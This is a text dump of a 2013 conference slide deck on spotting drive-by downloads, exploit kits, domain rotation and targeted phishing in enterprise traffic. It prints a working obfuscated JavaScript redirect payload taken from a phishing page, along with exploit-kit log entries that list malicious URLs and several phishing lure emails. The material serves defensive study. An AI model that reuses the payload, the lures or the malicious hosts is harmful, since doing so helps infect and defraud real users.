SlideShare a Scribd company logo
1 of 80
Download to read offline
DISSECTING RAW DATA:
finding needles in the haystack
or the way to survive in the Dangerous
Russian Environment
Fyodor Yarochkin
Vladimir Kropotov
Vitaly Chetvertakov
May 2013, Moscow
About the speakers
Common interest: investigating unlawful activities for fun and profit ;-)
We can't spell. All mistakes are ours :)
All the pictures used in this prezo are (c) googled ;-)
Agenda
●Methodology of dealing with emerging threats
●Case studies
●Automation techniques and tools
●Q&A
Overview
●
Understand threats
●
Real time visibility
●
You owned. Your
actions?
●
Owned: finding who
targets you, what
data they want.
What's been
compromised
Prepare
Protect
Investigate
Detect
Getting ready :)
PREPARE
Initial network compromise: threats
●DbD attacks
●Email as attack vector
●Direct attacks against servers
Client-targeting attacks are on the
rise
EASY!
Bigger
number of
targets!
Users
cumulative IQ
< 0! ;-)
Drive-By in Nutshell :)
●
Visit an infected site (any banner network can
be a lead too)
●
Traffic distribution/TDS (not compulsory)
●
Target Identification (javascript exploit
selection)
●
Exploit
●
Payload (.exe)
●
Profit!
STILL
BIG!!
DBD attacks
● Easy to collect
samples
● Payload sent over
the wire in plain
● Easy to automate
analysis with
sandbox
● Payload is typically
encoded (XOR) or
encrypted
● Exploit triggered on
user events
● Serve once per IP,
Blacklisting
Before... Now
APT!
APT!
APT!
APT!
APT!
APT! APT! APT!
APT!
APT!
APT!
APT!
APT!
APT!
APT!
So, what is APT?
Someone wants YOUR stuff :-)
Drive by .. are you a target?
● A single exploit
● Served to limited
range of IP address
(some times)
● Payload behavior is
very specific
● Exploit packs
● Generic Exploit
packs (Redkit,
Nitrino, famous
Blackhole etc)
● Payload vary
APT Not APT
APT-related driveby example
● Does not include
many exploits
● Is not using any off-
shelf exploit pack
● Exploit code changes
often
APT example cont..
● Binary pattern
payload. VM
sandbox detection
Call-back analysis
Bot vs Human
Exploit packs and kits
Bodyless Bot
GET;http://demonsstoryboard.pw
/80F5;HTTP/1.1
95.211.7
.3
200 57505 http://234x
120.adv.vz
.ru/cgi-
bin/iframe/
vz?
1787&opti
ons=N
Mozilla/4.0;
(compatible;;MSI
E;7.0;;Windows;
NT;6.1)
text/html
GET;http://demonsstoryboard.pw
/080F5wj;HTTP/1.1
95.211.7
.3
200 20380 - Mozilla/4.0;
(Windows;7;6.1);
Java/1.7.0_07
applicati
on/java-
archive
GET;http://demonsstoryboard.pw
/180F5wj;HTTP/1.1
95.211.7
.3
200 135534 - Java/1.7.0_07 applicati
on/octet-
stream
Exploit kits in your log
Crosss-domain
GET;http://teware.info/crossdomain.xml;HTTP
/1.1
62.109.7.187 20
0
391 Mozilla/4.0;
(compatible;;M
SIE;7.0;;Windo
ws)
text/xml
GET;http://teware.info/counter/hit/client_de5
df061c99066d82cfc437f2b099455;HTTP/1.1
62.109.7.187 20
0
826 http://www.divetour.su
/admin/lang/EN/logit.s
wf
Mozilla/4.0;
(compatible;;M
SIE;7.0;;Windo
ws;NT;6.1)
text/html
GET;http://isxops.info/ocycytyruwewufibegidu
tivabi;HTTP/1.1
82.146.56.20
1
20
0
27206 http://www.divetour.su
/
Mozilla/4.0;
(compatible;;M
SIE;7.0;;Windo
ws;NT;6.1)
text/html
GET;http://tolizuhifa.ghmarspi.in.ua/izijyqyzo
xym;HTTP/1.1
188.120.230.
94
20
0
9926 Mozilla/4.0;
(Windows;7;6.1
);Java/1.7.0_07
application/3dr
GET;http://tolizuhifa.ghmarspi.in.ua/ebyhodu
cibe;HTTP/1.1
188.120.230.
94
20
0
16433
2
Mozilla/4.0;
(Windows;7;6.1
);Java/1.7.0_07
application/ex
ecutable
GET;http://dapru.crackedsidewalks.com/viewforum.php?
b=75c3d28;HTTP/1.1
37.9.52.2
1
20
0
94
9
http://verygoodcom.ne
t/forum/viewtopic.php?
f=31363995&t=45869
451
Mozilla/4.0;
(compatible;;M
SIE;7.0;;Windo
ws;NT;6.1)
text/ht
ml
GET;http://dapru.crackedsidewalks.com/profile.php?
exp=atom&b=75c3d28&k=eb5e2a99b9c4326e02b6e9efbe1
39972;HTTP/1.1
37.9.52.2
1
20
0
64
7
- Mozilla/4.0;
(Windows;7;6.1
);Java/1.7.0_07
applic
ation/j
ava-
archiv
e
GET;http://dapru.crackedsidewalks.com/y41gr.php?
exp=atom&b=75c3d28&k=eb5e2a99b9c4326e02b6e9efbe1
39972;HTTP/1.1
37.9.52.2
1
40
3
29
5
- Mozilla/4.0;
(Windows;7;6.1
);Java/1.7.0_07
-
Get 0wned quick!
Domain-rotation techniques
http://olgaclaroto.com/mikcxwe.php
http://fcslavutich.ck.ua/nmwdbvg.php
http://temizayakkabi.com/larwyyo.php
http://familystori.com/mhwrdaw.php
http://www.residensea.jp/xuaioxc.php
http://firenzeviaroma.ru/dqryony.php
http://sphynxtoutnu.com/dnqaibb.php
http://www.icmjapan.co.jp/dgttcnm.php
http://www.controlseal.nl/yolelkx.php
http://ural.zz.mu/ledstsn.php
http://www.fotobit.pl/cpjjpei.php
http://bgcarshop.com/tgghhvy.php
http://www.borkowski.org/fudbqrf.php
http://shop.babeta.ru/puthnkn.php
http://e-lustrate.us/mycbbni.php
http://notarypublicconcept.com/shfvtpx.php
http://www.stempelxpress.nl/vechoix.php
http://64.68.190.53/dqohago.php
http://likos.orweb.ru/oydochh.php
http://wap.warelex.com/parpkeu.php
http://caglayandalgicpompa.com/vgptlav.php
http://v-madrid.ru/iqsjnvl.php
http://www.tamandhiep.com/caectvo.php
http://bulgurluhamami.com/wyscthy.php
http://pcprint.es/xymijte.php
http://genckoltukdoseme.com/jydudjd.php
http://www.mgftools.com/fakmgbv.php
http://ohtparis.com/msmfguo.php
http://kenankocticaret.com/myrivrk.php
http://restaurangmaskiner.net/rwuwkqx.php
http://fvp.nau.edu.ua/uhetymf.php
http://kontra-antiabzocker.net/xubolww.php
http://artmaster39.ru/jtfsajd.php
http://drcalotti.com/llfisbj.php
http://adult-toy.ru/immjdti.php
http://corumhaberi.com/ugfrcal.php
http://opr.kz/jwcxbwi.php
http://peggysmith.nl/thtaywn.php
http://nic-ram.com/jqdkfrh.php
http://minsociety.org/djafssg.php
Domain rotation victims
● Over 500
compromised
domains in 24 hours
● Domain rotation once
per minute (3
minutes in the other
incident)
TDS injections
GET;http://ctgwllr.changeip.name/googlestat.php;HTTP/1
.1
37.10.104.
72
20
0
64
0
http://www.english-
shoes.ru/products/4
1/
Mozilla/4.0;
(compatible;;M
SIE;7.0;;Windo
ws;NT;6.1)
text/html
GET;http://ctgwllr.changeip.name/uqrojdt/2;HTTP/1.1 37.10.104.
72
20
0
44
2
http://www.english-
shoes.ru/products/4
1/
Mozilla/4.0;
(compatible;;M
SIE;7.0;;Windo
ws;NT;6.1)
text/html
GET;http://qxcrr-xerox.janitorbe.biz/stranger-
constructing-restoring.html;HTTP/1.1
31.7.184.1
94
20
0
15
78
3
http://ctgwllr.change
ip.name/uqrojdt/2
Mozilla/4.0;
(compatible;;M
SIE;7.0;;Windo
ws;NT;6.1)
text/html
GET;http://qxcrr-
xerox.janitorbe.biz/a544444444ZZZZZZZZwwwwwww/9
d20Z7eQ7QeQe/citizen.php5;HTTP/1.1
31.7.184.1
94
20
0
46
6
http://qxcrr-
xerox.janitorbe.biz/s
tranger-
constructing-
restoring.html
Mozilla/4.0;
(compatible;;M
SIE;7.0;;Windo
ws;NT;6.1)
text/html
GET;http://qxcrr-
xerox.janitorbe.biz/7ll05ywogDrmqqQeZrZwDGooerrraQ
q/901212121255;HTTP/1.1
31.7.184.1
94
20
0
10
01
http://qxcrr-
xerox.janitorbe.biz/a
544444444ZZZZZZ
ZZwwwwwww/9d20
Z7eQ7QeQe/citizen.
php5
Mozilla/4.0;
(compatible;;M
SIE;7.0;;Windo
ws;NT;6.1)
text/html
GET;http://qxcrr-
xerox.janitorbe.biz/7ll05ywogDrmqqQeZrZwDGooerrraQ
q/text.jar;HTTP/1.1
31.7.184.1
94
20
0
87
72
Mozilla/4.0;
(Windows;7;6.1
);Java/1.7.0_07
applicatio
n/x-jar
GET;http://qxcrr-
xerox.janitorbe.biz/7ll05ywogDrmqqQeZrZwDGooerrraQ
q/0256000045/6799928;HTTP/1.1
31.7.184.1
94
20
0
86
36
4
Mozilla/4.0;
(Windows;7;6.1
);Java/1.7.0_07
applicatio
n/java-
archive
Electronic Mail as attack vector
●
Email is another common method for an
adversary to put a foot into the target
network.
●
Attractiveness:
●
Low profile (you only send emails to those
who you want to comromise)
●
Easy antivirus bypass (password-packed zip
archives anyone?:)
●
Users are generally – idiots ;-)
Email as attack vector.. are you a
target?
● Single exploit
● Content of the mail is
accurate to context
● Specific payload
behavior (stats)
● Mass-mailed
● Often no exploit used
(.exe in attach)
APT? Non-targeted
APT through email..
An RTF document
(CVE-2012-0158 - "MSCOMCTL.OCX RCE
Vulnerability." )
Payload writes a dll file
Recent build date (2013)
Autorun for persistence
Calls back to C2 server group
Suspicious user Agents:
Mozilla/4.0 (compatible; MSIE 6.0.1.3;
Windows NT 5.0.3)
Mozilla/4.0 (compatible; MSIE 5.0.2)
Mozilla/4.0 (compatible)
How to catch...
● Suspicious agents – works nicely (and easy to
implement with snort, surricata, etc)
● Time-series traffic analysis
Emerging Threats has a large number of
APT related sigs. Take-and-modify :)
Owning a network..
●
Vulnerabilities seen in use through this attack
vector:
Adobe Acrobat
reader
CVE-2013-0640
CVE-2012-0775
Adobe flash
player
CVE-2012-1535
MS Office
CVE-2012-0158
CVE-2011-1269
CVE-2010-3333
CVE-2009-3129
Java
CVE-2013-0422
CVE-2012-1723
CVE-2012-5076
But...
●
Human stupidity is exploited more than ever..
Email with a password protected
archive or a document
●
Password protected archives bypass AV checks,
firewall/WAF/.. detection
●
No exploit. Executable File is masked as
document (icon, extension)
●
Message contents motivates user to open the
attachment (social engineering)
Добрый день,
По результатам проверки, у нашей фирмы обнаружился долг перед Вами
за январь на
сумму 9540 рубл. Наш главбух составила акт сверки и просит подписать
данный акт
и выслать его скан. А также спрашивает, что лучше написать при
переводе средств.
______________________________________________________________
_______________________
С уважением, комерческий директор ОАО "М-ТОРГ"
Маркина Ольга Алексеевна
ps. акт сверки в приложении к письму, пароль к архив 111
Lets look at some examples
Добрый день,
По результатам аудиторской проверки, у нашей фирмы обнаружился долг пере
Вами за
декабрь 2012г. в сумме 49540 рубл. Наш главбух составила акт сверки и просит
подписать
данный акт и выслать его скан. А также спрашивает, что лучше написать при
переводе
средств.
_______________________________________________________________________
________
С уважением, бухгалтер ЗАО "МСК"
Калинина Вера Владимировна
ps. акт сверки в приложении к письму, пароль к архиву 123
Examples (cont...)
Good afternoon, According to the results of the audit, our firm will transfer
the debt to you for? December 2012. in the sum of 49540 rubles. Our chief
accountant make an act of reconciliation and asked to sign the act and send
it’s scan.
______________________________________________________________________________
Sincerely, Accountant of "MSK"? Vera V. Kalinina
P.s. statement attached to the letter, the password for the archive 123
Unpacked file
.. and inside archive :)
Subject: British Airways E-ticket receipts
e-ticket receipt
Booking reference: 05V9363845
Dear,
Thank you for booking with British Airways.
Ticket Type: e-ticket
This is your e-ticket receipt. Your ticket is held in our systems, you will not receive a paper ticket for
your booking.
Your itinerary is attached (Internet Exlplorer/Mozilla Firefox file)
Yours sincerely,
British Airways Customer Services
British Airways may monitor email traffic data and also the content of emails, where permitted by
law, for the purposes of security and staff training and in order to prevent or detect unauthorised use
of the British Airways email system.
British Airways Plc is a public limited company registered in England and Wales. Registered number:
89510471. Registered office: Waterside, PO Box 365, Harmondsworth, West Drayton, Middlesex,
England, UB7 0GB.
How to contact us
Although we are unable to respond to individual replies to this email we have a comprehensive
section that may help you if you have a question about your booking or travelling with British
Airways.
If you require further assistance you may contact us
If you have received this email in error
This is a confidential email intended only for the British Airways Customer appearing as the
addressee. If you are not the intended recipient please delete this email and inform the snder as soon
as possible. Please note that any copying, distribution or other action taken or omitted to be taken in
reliance upon it is prohibited and may be unlawful.
Another example
Another variation: email that
contains masked links to malicious
pages
•No attachment. The message text is
html/text points to the same resource
•All links are 'masked' to be pointing to
legit links
•The same attreactive text of the message
<body>
<h1><b>Please wait. You will be forwarded.. . </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}
catch(gdsgd){v="val";if(document)try{document.body=12;}catch(gdsgsdg)
{asd=0;try{}catch(q){asd=1;}if(!asd)
{w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new
Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,
39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,
44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,100,111,113,
115,109,44,106,97,45,112,117,57,54,48,55,46,47,101,109,114,116,107,47,107,10
3,110,106,113,47,98,109,108,116,107,110,45,110,104,111,32,59,124);}w=f;s=[];i
f(window.document)for(i=2-2;-i+104!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]
+j%zz);}xz=e;if(v)xz(s)}</script>
</body>
</html>
Encoded redirect..
Hot topic for big company, Cyprus
Crisis
Diana Ayala saw this story on the BBC News website and thought you should see it.
** Cyprus bailout: bank levy passed parliament already! **
Cyprus can amend terms to a bailout deal that has sparked huge public anger....
< http://www.bbc.com.us/go/em/news/world-cyprus-57502820>
** BBC Daily E-mail **
Choose the news and sport headlines you want - when you want them, all in one daily e-mail
< http://www.bbc.co.uk/email>
** Disclaimer **
The BBC is not responsible for the content of this e-mail, and anything written in this e-mail does not
necessarily reflect the BBC's views or opinions. Please note that neither the e-mail address nor name of
the sender have been verified.
If you do not wish to receive such e-mails in the future or want to know more about the BBC's Email a
Friend service, please read our frequently asked questions by clicking here
This message is to notify you that your package has been processed and is on schedule for delivery
from ADP.
Here are the details of your delivery:
Package Type: QTR/YE Reporting
Courier: UPS Ground
Estimated Time of Arrival: Tusesday, 5:00pm
Tracking Number (if one is available for this package): 1Z023R961390411904
Details: Click here to view and/or modify order
We will notify you via email if the status of your delivery changes.
--------------------------------------------------------------------------------
Access these and other valuable tools at support.ADP.com:
o Payroll and Tax Calculators
o Order Payroll Supplies, Blank Checks, and more
o Submit requests online such as SUI Rate Changes, Schedule Changes, and more
o Download Product Documentation, Manuals, and Forms
o Download Software Patches and Updates
o Access Knowledge Solutions / Frequently Asked Questions
o Watch Animated Tours with Guided Input Instructions
Thank You,
ADP Client Services
support.ADP.com
--------------------------------------------------------------------------------
This message and any attachments are intended only for the use of the addressee and
may contain information that is privileged and confidential. If the reader of the message
is not the intended recipient or an authorized representative of the intended recipient,
you are hereby notified that any dissemination of this communication is strictly
prohibited. If you have received this communication in error, notify the sender
immediately by return email and delete the message and any attachments from your
system.
What happens if you click..
So once we have the basic knowledge, lets move on :)
DETECT
We will spend a bit more time discussing detection activities.
Because this is what we primarily do :)
So how you detect attacks
in your traffic..
What to look for..
• Search for randomly generated
domains
• Search for 3rd level domains with
dynamic dns prefixes (dyndns,
dnsdojo and e.t.c.)
• Search by known malware IPs
• Search by known constant parts in
URLs and domain names
• Search by intermediate domains that
used in attack
• Banner networks simulation
• DGA generated domains
• Compromised domains
• dyndns
• Time-based redirects (9 till 6pm Moscow time)
• Using not standard ports
• Once per IP per day
• Blacklists (Yes! They blacklist us too)
Common Counter-Detection
Techniques
1)MIME type
• applicationjava-archive,
applicationx-jar,
application3dr for Java Exploits
• applicationPDF for Acrobat
reader Exploits
• applicationx-shockwave-flash
for adobe flash player
2) User agent
(Mozilla(Windows ...)
•
Things to look for..
Example..
• Exploit code/Malware components in Temp folder
• activity of installer malware
• Detect bruteforce attacks for standard a/c: admin, guest
• Look for other suspicious IDS events
HTTP_Probe, SMB_Probes etc
Other things to pay attention to...
Antivirus find exploit in cache -> we was attacked -> antivirus
saves us! ;-)
The exploit can be in cache – AV finds it :)
AV logs – useful ;)
Antivirus detect malware modules
PROTECT
Approaches
Identify impact
and isolate impacted machines
Exploit features of exploit kits to immunize your
network
Attacker wants to serve
once per IP...
● Automate visits to exploit pack serving points
from your Client Honeybox/VM.
● Magic – exploit is not served to your users
anymore.
Exploiting
Redundancy
Properties in
the malware
distribution and
postinfection
activities
campaigns
INVESTIGATE
DNSLyzer
http://github.com/fygrave/dnslyzer/
Not only payload used as transition
(covert channel in URL)
●
GET hxxp://lionsholders.biz/st.php?
os=windows
%207&browser=msie&browserver=8.0&
adobe%20reader=10.1&adobe
%20flash=11.7.700.169&windows%20media
%20player=12.0.7601.17514&java=0&silverli
ght=0
GET READY FOR AV TROLL!! :)
Strange things happen on the wire;)
Useful tools
● AOL Moloch https://github.com/aol/moloch
APT mail
● Xecure-lab APT document scanner
TIPS
Encrypted payload in not targeted
attacks
●
If full attack session was not collected (e.g. traffic
dumps) don't waste vendors time
●
Block all unrecognized/ uncategorized content
(Default Deny) or you get FN at all
intermediate (transit) hosts
Be careful to share/check online
samples especially for targeted
attacks
●
Vendors are sharing while attackers monitor
changes
●
FP ~ your shared some internal staff
(especially not executable files, like office
documents) with third party = security policy
violation
Monitoring VS Protection
●
Strange, but true
Efficiency(Monitoring)~O(1/ Efficiency(Protection))
Incident Mitigation VS Investigation
●
If your preparation is not enough
Efficiency(Mitigation)~
O(1/ Efficiency(Investigation))
●
If you prepared, almost all steps of Investigation
you can do asynchronously
Tracking Activity in the organization
in 3rd party networks
●
Examples in the presentation related to incidents in
the third party networks and reproduced in the
attacker desirable, but adopted environment.
DISCLAIMER
Q & A

More Related Content

What's hot

In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you screamMario Heiderich
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
Client sidesec 2013 - non js
Client sidesec 2013 - non jsClient sidesec 2013 - non js
Client sidesec 2013 - non jsTal Be'ery
 
NullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scannerNullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scannerNishant Das Patnaik
 
Security Vulnerabilities: How to Defend Against Them
Security Vulnerabilities: How to Defend Against ThemSecurity Vulnerabilities: How to Defend Against Them
Security Vulnerabilities: How to Defend Against ThemMartin Vigo
 
Client sidesec 2013 - script injection
Client sidesec 2013 - script injectionClient sidesec 2013 - script injection
Client sidesec 2013 - script injectionTal Be'ery
 
Dom based xss
Dom based xssDom based xss
Dom based xssLê Giáp
 
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.SecuRing
 
CONFidence 2015: Trust boundaries - Mateusz Kocielski
CONFidence 2015: Trust boundaries - Mateusz KocielskiCONFidence 2015: Trust boundaries - Mateusz Kocielski
CONFidence 2015: Trust boundaries - Mateusz KocielskiPROIDEA
 
Passwords#14 - mimikatz
Passwords#14 - mimikatzPasswords#14 - mimikatz
Passwords#14 - mimikatzBenjamin Delpy
 
Toorcon - Purple Haze: The Spear Phishing Experience
Toorcon - Purple Haze: The Spear Phishing ExperienceToorcon - Purple Haze: The Spear Phishing Experience
Toorcon - Purple Haze: The Spear Phishing ExperienceJesse Nebling
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł MaziarzPROIDEA
 
Even the LastPass Will be Stolen Deal with It!
Even the LastPass Will be Stolen Deal with It!Even the LastPass Will be Stolen Deal with It!
Even the LastPass Will be Stolen Deal with It!Martin Vigo
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSecuRing
 
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ..."Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...PROIDEA
 
Yihan Lian & Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]
Yihan Lian &  Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]Yihan Lian &  Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]
Yihan Lian & Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]RootedCON
 

What's hot (20)

In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you scream
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Client sidesec 2013 - non js
Client sidesec 2013 - non jsClient sidesec 2013 - non js
Client sidesec 2013 - non js
 
NullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scannerNullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
 
Security Vulnerabilities: How to Defend Against Them
Security Vulnerabilities: How to Defend Against ThemSecurity Vulnerabilities: How to Defend Against Them
Security Vulnerabilities: How to Defend Against Them
 
Client sidesec 2013 - script injection
Client sidesec 2013 - script injectionClient sidesec 2013 - script injection
Client sidesec 2013 - script injection
 
Dom based xss
Dom based xssDom based xss
Dom based xss
 
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
 
CONFidence 2015: Trust boundaries - Mateusz Kocielski
CONFidence 2015: Trust boundaries - Mateusz KocielskiCONFidence 2015: Trust boundaries - Mateusz Kocielski
CONFidence 2015: Trust boundaries - Mateusz Kocielski
 
Passwords#14 - mimikatz
Passwords#14 - mimikatzPasswords#14 - mimikatz
Passwords#14 - mimikatz
 
Toorcon - Purple Haze: The Spear Phishing Experience
Toorcon - Purple Haze: The Spear Phishing ExperienceToorcon - Purple Haze: The Spear Phishing Experience
Toorcon - Purple Haze: The Spear Phishing Experience
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz
 
Even the LastPass Will be Stolen Deal with It!
Even the LastPass Will be Stolen Deal with It!Even the LastPass Will be Stolen Deal with It!
Even the LastPass Will be Stolen Deal with It!
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
URL to HTML
URL to HTMLURL to HTML
URL to HTML
 
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ..."Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
 
Rainbow Tables
Rainbow TablesRainbow Tables
Rainbow Tables
 
Yihan Lian & Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]
Yihan Lian &  Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]Yihan Lian &  Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]
Yihan Lian & Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]
 
mimikatz @ rmll
mimikatz @ rmllmimikatz @ rmll
mimikatz @ rmll
 

Similar to Phd III - defending enterprise

WebGoat.SDWAN.Net in Depth
WebGoat.SDWAN.Net in DepthWebGoat.SDWAN.Net in Depth
WebGoat.SDWAN.Net in Depthyalegko
 
WebGoat.SDWAN.Net in Depth: SD-WAN Security Assessment
WebGoat.SDWAN.Net in Depth: SD-WAN Security Assessment WebGoat.SDWAN.Net in Depth: SD-WAN Security Assessment
WebGoat.SDWAN.Net in Depth: SD-WAN Security Assessment Sergey Gordeychik
 
Taming botnets
Taming botnetsTaming botnets
Taming botnetsf00d
 
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisLife Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisPositive Hack Days
 
How to hide your browser 0-days
How to hide your browser 0-daysHow to hide your browser 0-days
How to hide your browser 0-daysZoltan Balazs
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopErnest Staats
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopErnest Staats
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Web Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteWeb Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteAndrew Sorensen
 
Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest Haydn Johnson
 
Hitbkl 2012
Hitbkl 2012Hitbkl 2012
Hitbkl 2012F _
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The EnterpriseJason Ross
 
Bridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial TradecraftBridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial Tradecraftenigma0x3
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedfangjiafu
 
Shall we play a game?
Shall we play a game?Shall we play a game?
Shall we play a game?Maciej Lasyk
 
You Spent All That Money And Still Got Owned
You Spent All That Money And Still Got OwnedYou Spent All That Money And Still Got Owned
You Spent All That Money And Still Got OwnedJoe McCray
 

Similar to Phd III - defending enterprise (20)

WebGoat.SDWAN.Net in Depth
WebGoat.SDWAN.Net in DepthWebGoat.SDWAN.Net in Depth
WebGoat.SDWAN.Net in Depth
 
WebGoat.SDWAN.Net in Depth: SD-WAN Security Assessment
WebGoat.SDWAN.Net in Depth: SD-WAN Security Assessment WebGoat.SDWAN.Net in Depth: SD-WAN Security Assessment
WebGoat.SDWAN.Net in Depth: SD-WAN Security Assessment
 
Taming botnets
Taming botnetsTaming botnets
Taming botnets
 
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisLife Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
 
How to hide your browser 0-days
How to hide your browser 0-daysHow to hide your browser 0-days
How to hide your browser 0-days
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
Web Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteWeb Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your website
 
Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest
 
WAF protections and bypass resources
WAF protections and bypass resourcesWAF protections and bypass resources
WAF protections and bypass resources
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
Hitbkl 2012
Hitbkl 2012Hitbkl 2012
Hitbkl 2012
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The Enterprise
 
Bridging the Gap
Bridging the GapBridging the Gap
Bridging the Gap
 
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps Security
 
Bridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial TradecraftBridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial Tradecraft
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
 
Shall we play a game?
Shall we play a game?Shall we play a game?
Shall we play a game?
 
You Spent All That Money And Still Got Owned
You Spent All That Money And Still Got OwnedYou Spent All That Money And Still Got Owned
You Spent All That Money And Still Got Owned
 

More from F _

Rsa2016
Rsa2016Rsa2016
Rsa2016F _
 
Hitcon 2014: Surviving in tough Russian Environment
Hitcon 2014: Surviving in tough Russian EnvironmentHitcon 2014: Surviving in tough Russian Environment
Hitcon 2014: Surviving in tough Russian EnvironmentF _
 
Honeycon2014: Mining IoCs from Honeypot data feeds
